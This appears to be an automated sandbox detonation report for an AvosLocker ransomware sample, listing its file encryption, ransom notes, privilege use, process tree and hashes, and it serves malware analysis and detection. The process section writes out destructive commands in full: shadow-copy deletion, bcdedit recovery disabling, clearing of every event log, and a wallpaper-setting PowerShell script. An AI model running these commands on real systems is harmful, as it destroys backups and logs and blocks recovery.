memory/3912-24587-0x000000001B540000-0x000000001B822000-memory.dmp

memory/3912-24588-0x0000000001E80000-0x0000000001E88000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-09 16:28

Reported

2024-09-09 16:31

Platform

win10v2004-20240802-en

Max time kernel

93s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (8501) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\240249736.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr\profile.jfc C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClient.man C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Windows Defender\it-IT\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\de-DE\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\Office.Runtime.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Grace-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\resources.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\dynalink.md C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ur.pak C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_200_percent.pak C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxLargeTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses.svg C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeWideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\VisualElements\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\ECLIPSE.ELM C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr_2x.gif C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch-Dark.scale-200.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-256_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxslt.md C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-150.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxAccountsSplashLogo.scale-180.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\LAYERS.ELM C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub2019_eula.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_agreement_filetype.svg C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptyView.scale-150.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare_f_col.hxk C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.scale-100.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Common Files\microsoft shared\Triedit\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1356 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 184 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 184 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3476 wrote to memory of 34716 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3476 wrote to memory of 34716 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 216 wrote to memory of 34728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 216 wrote to memory of 34728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4372 wrote to memory of 34740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4372 wrote to memory of 34740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 184 wrote to memory of 18588 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 184 wrote to memory of 18588 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2952 wrote to memory of 15604 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2952 wrote to memory of 15604 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1356 wrote to memory of 23168 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1356 wrote to memory of 23168 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 23168 wrote to memory of 22688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 23168 wrote to memory of 22688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 23168 wrote to memory of 22224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 23168 wrote to memory of 22224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\240249736.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 44.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

C:\GET_YOUR_FILES_BACK.txt

MD5 01188d22b1675e3437b1418e14f4ffab
SHA1 6e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256 e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA512 6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d

memory/15604-17708-0x0000017DFABF0000-0x0000017DFAC12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51kx1lm4.ws3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c8861299853606fac3016094fcb76d2e
SHA1 8969dfdc86ceceb91bec0956f6a672a8606bc841
SHA256 07b966f55b6c7b2f633c7a4ace5c3cc0fc6f6dcbea8ff0da2210ed4a34c2cdf0
SHA512 841ca021eb2e9cb9831c2637f97739b0f2b35919b4e7eea3e39af808564f06b1d2175d618912603d1f61b364882c626799f68e069b13224d5db920ac7a267ef3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00